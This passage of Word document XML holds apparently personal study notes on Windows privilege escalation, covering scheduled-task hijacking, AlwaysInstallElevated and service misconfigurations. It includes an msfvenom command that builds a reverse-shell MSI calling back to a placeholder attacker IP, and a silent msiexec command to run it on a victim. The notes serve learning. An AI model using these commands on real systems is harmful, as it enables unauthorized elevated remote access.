    <w:p w14:paraId="35AF7D8B" w14:textId="493EA46F" w:rsidR="001050F1" w:rsidRPr="001050F1" w:rsidRDefault="001050F1" w:rsidP="001050F1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">For all info </w:t>
      </w:r>
      <w:r w:rsidRPr="001050F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001050F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\&gt; </w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_Hlk192453859"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001050F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t>schtasks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001050F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t xml:space="preserve"> /query /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001050F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t>tn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001050F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001050F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t>vulntask</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001050F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001050F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t>fo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001050F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t xml:space="preserve"> list /v</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="751A4E68" w14:textId="11C26A5F" w:rsidR="001050F1" w:rsidRDefault="001050F1" w:rsidP="001050F1">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A776E3D" wp14:editId="50828CD5">
            <wp:extent cx="4229100" cy="1203215"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6107800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0086" name="Picture 1" descr="A screen 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48243" cy="1208661"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4268D2" w14:textId="6BB5D4E1" w:rsidR="00C451E4" w:rsidRDefault="00C451E4" w:rsidP="00C451E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C451E4">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C451E4">
        <w:t>fo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C451E4">
        <w:t> stands for "format output."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784CF829" w14:textId="541362BC" w:rsidR="00C451E4" w:rsidRPr="00C451E4" w:rsidRDefault="00C451E4" w:rsidP="00C451E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="404040"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C451E4">
        <w:rPr>
          <w:rFonts w:ascii="var(--ds-font-family-code)" w:eastAsia="Times New Roman" w:hAnsi="var(--ds-font-family-code)" w:cs="Courier New"/>
          <w:color w:val="404040"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C451E4">
        <w:rPr>
          <w:rFonts w:ascii="var(--ds-font-family-code)" w:eastAsia="Times New Roman" w:hAnsi="var(--ds-font-family-code)" w:cs="Courier New"/>
          <w:color w:val="404040"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>tn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C451E4">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="404040"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> stands for "task name."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4454ED1E" w14:textId="01BBFD5C" w:rsidR="00C451E4" w:rsidRDefault="00C451E4" w:rsidP="001050F1"/>
    <w:p w14:paraId="197FBCD4" w14:textId="033721DA" w:rsidR="00D3539D" w:rsidRDefault="001050F1" w:rsidP="001050F1">
      <w:r w:rsidRPr="001050F1">
        <w:t>"Task to Run" parameter which indicates what gets executed by the scheduled task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647E7452" w14:textId="6FFD3E9E" w:rsidR="001050F1" w:rsidRDefault="001050F1" w:rsidP="001050F1">
      <w:r>
        <w:t xml:space="preserve">Try To Override the </w:t>
      </w:r>
      <w:r w:rsidRPr="001050F1">
        <w:t>"Task to Run"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> parameter (See file permissions by </w:t>
      </w:r>
      <w:r w:rsidRPr="001050F1">
        <w:rPr>
          <w:rStyle w:val="codewChar"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t>icacls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7CBC1F" w14:textId="77777777" w:rsidR="001050F1" w:rsidRDefault="001050F1" w:rsidP="00D3539D"/>
    <w:p w14:paraId="1D472722" w14:textId="77777777" w:rsidR="00C451E4" w:rsidRPr="00C451E4" w:rsidRDefault="00C451E4" w:rsidP="00C451E4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C451E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AlwaysInstallElevated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4DB4F75A" w14:textId="77777777" w:rsidR="00C451E4" w:rsidRDefault="00C451E4" w:rsidP="00C451E4">
      <w:r w:rsidRPr="00C451E4">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Windows installer files (also known as </w:t>
      </w:r>
      <w:r w:rsidRPr="00C451E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C451E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C451E4">
        <w:t xml:space="preserve"> files) are used to install applications on the system. They usually run with the privilege level of the user that starts it. However, these can be configured to run with higher privileges from any user account (even unprivileged ones). This could potentially allow us to generate a malicious MSI file that would run with admin privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215445E3" w14:textId="25D1E4FB" w:rsidR="00C451E4" w:rsidRPr="00C451E4" w:rsidRDefault="00C451E4" w:rsidP="00C451E4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C451E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>generate a malicious .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C451E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C451E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> file using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C451E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5DB5B388" w14:textId="631F661E" w:rsidR="00C451E4" w:rsidRPr="00C451E4" w:rsidRDefault="00C451E4" w:rsidP="00C451E4">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00C451E4">
        <w:t>msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_MACHINE_IP LPORT=LOCAL_PORT -f msi -o malicious.msi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB9F618" w14:textId="565A94C2" w:rsidR="00C451E4" w:rsidRDefault="00C451E4" w:rsidP="00C451E4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>run the .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> file after </w:t>
      </w:r>
      <w:r w:rsidR="00937CC8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>transferring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> it to victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044A5D86" w14:textId="2789A28B" w:rsidR="00C451E4" w:rsidRPr="00C451E4" w:rsidRDefault="00C451E4" w:rsidP="00C451E4">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00C451E4">
        <w:t>C:\&gt; msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61384723" w14:textId="05AD467C" w:rsidR="00937CC8" w:rsidRPr="00937CC8" w:rsidRDefault="00937CC8" w:rsidP="00937CC8">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00937CC8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/quiet: Runs the installer in "quiet mode".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4428DDA3" w14:textId="6C09C19F" w:rsidR="00937CC8" w:rsidRPr="00937CC8" w:rsidRDefault="00937CC8" w:rsidP="00937CC8">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00937CC8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/qn: "no UI." The q stands for "quiet," and the n stands for "no UI." installation happens completely in the background.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DDB3F9" w14:textId="7D9160E1" w:rsidR="00C451E4" w:rsidRDefault="00937CC8" w:rsidP="00937CC8">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00937CC8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00937CC8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00937CC8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Specifies the path to the .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00937CC8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00937CC8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> file to be installed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD90EE9" w14:textId="77777777" w:rsidR="00937CC8" w:rsidRPr="00937CC8" w:rsidRDefault="00937CC8" w:rsidP="00937CC8">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04FE07E5" w14:textId="77777777" w:rsidR="00937CC8" w:rsidRPr="00937CC8" w:rsidRDefault="00937CC8" w:rsidP="00937CC8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00937CC8">
        <w:t>Abusing Service Misconfigurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20818E52" w14:textId="77777777" w:rsidR="00937CC8" w:rsidRPr="00937CC8" w:rsidRDefault="00937CC8" w:rsidP="00937CC8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00937CC8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B934780" w14:textId="4630501C" w:rsidR="00C451E4" w:rsidRDefault="00937CC8" w:rsidP="00937CC8">
      <w:r w:rsidRPr="00937CC8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service Control Manager</w:t>
      </w:r>
      <w:r w:rsidRPr="00937CC8">
        <w:t> (SCM)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00937CC8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command” to control services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EB3AE7" w14:textId="19CAF84B" w:rsidR="00937CC8" w:rsidRDefault="00937CC8" w:rsidP="00937CC8">
      <w:r w:rsidRPr="00937CC8">
        <w:t xml:space="preserve">Services have a </w:t>
      </w:r>
      <w:r w:rsidRPr="00937CC8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Discretionary Access Control List (DACL)</w:t>
      </w:r>
      <w:r w:rsidRPr="00937CC8">
        <w:t>, which indicates who has permission to start, stop, pause, query status, query configuration, or reconfigure the service</w:t>
      </w:r>
      <w:r w:rsidR="00EB5BEB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FD0B21" w14:textId="7EE8BFF5" w:rsidR="00C451E4" w:rsidRDefault="00EB5BEB" w:rsidP="00EB5BEB">
      <w:r w:rsidRPr="00EB5BEB">
        <w:t>All the services configurations are stored on the registry under</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB5BEB">
        <w:rPr>
          <w:rStyle w:val="codewChar"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t>HKLM\SYSTEM\CurrentControlSet\Services\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B334876" w14:textId="1F0FF334" w:rsidR="00C451E4" w:rsidRDefault="00EB5BEB" w:rsidP="00C451E4">
      <w:r>
        <w:t xml:space="preserve">Or can be viewed from </w:t>
      </w:r>
      <w:r w:rsidR="006D0EC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="006D0EC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">egistry </w:t>
      </w:r>
      <w:r w:rsidR="006D0EC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="006D0EC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ditor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (each service and its parameters consider a subkey)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449B6B90" w14:textId="59DEF7BA" w:rsidR="00EB5BEB" w:rsidRDefault="006D0EC1" w:rsidP="006D0EC1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="164E4517" wp14:editId="18B83D9E">
            <wp:extent cx="3004457" cy="1441241"/>
            <wp:effectExtent l="0" t="0" r="5715" b="6985"/>
            <wp:docPr id="2111267434" name="Picture 2"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7434" name="Picture 2" descr="A computer screen shot of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1550" cy="1449440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73E7C86E" wp14:editId="56ABD286">
            <wp:extent cx="2795905" cy="1276453"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="204937669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6692" name="Picture 3" descr="A screenshot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3869" cy="1298351"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="53249914" w14:textId="77777777" w:rsidR="00C451E4" w:rsidRDefault="00C451E4" w:rsidP="00C451E4"/>
    <w:p w14:paraId="5279EAB1" w14:textId="77777777" w:rsidR="00D019B3" w:rsidRPr="00D019B3" w:rsidRDefault="00D019B3" w:rsidP="00D019B3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D019B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Insecure Permissions on Service Executable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC5D504" w14:textId="77777777" w:rsidR="00D019B3" w:rsidRDefault="00D019B3" w:rsidP="00C451E4"/>
    <w:p w14:paraId="3DD0D272" w14:textId="77777777" w:rsidR="00C451E4" w:rsidRPr="00C451E4" w:rsidRDefault="00C451E4" w:rsidP="00C451E4"/>
    <w:p w14:paraId="2AA6CD86" w14:textId="77777777" w:rsidR="00D3539D" w:rsidRDefault="00D3539D" w:rsidP="00D3539D"/>
    <w:p w14:paraId="000DB488" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="52BD5430" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="58723D03" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="336CC41E" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="6B698E4C" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="451A8D36" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="19A5DC61" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="3DD67566" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="4B481B9E" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="60169226" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="3E6DA56E" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="5E1FFD42" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="1F17DB6A" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="1DFD0AA5" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="58EF4229" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="7B6BB288" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="2013CEE8" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="0B86312E" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="09F7D555" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="733C45CB" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="5EE01640" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="1F1877EF" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="76A22DA1" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="69C7DCF3" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="103DA8D6" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="3B3EA394" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="09D12D75" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="29B86399" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="028F346F" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="56200C56" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="049F0839" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="1ADE8996" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="4AA58458" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="1A432CAD" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="41AFE492" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="273B11E8" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="21020100" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="79FC17AE" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="5331BD02" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="71CA4C56" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="2C8B9F3E" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="658FE55C" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="3E778F33" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
    <w:p w14:paraId="7DD57344" w14:textId="77777777" w:rsidR="00C511CB" w:rsidRDefault="00C511CB" w:rsidP="00D3539D"/>
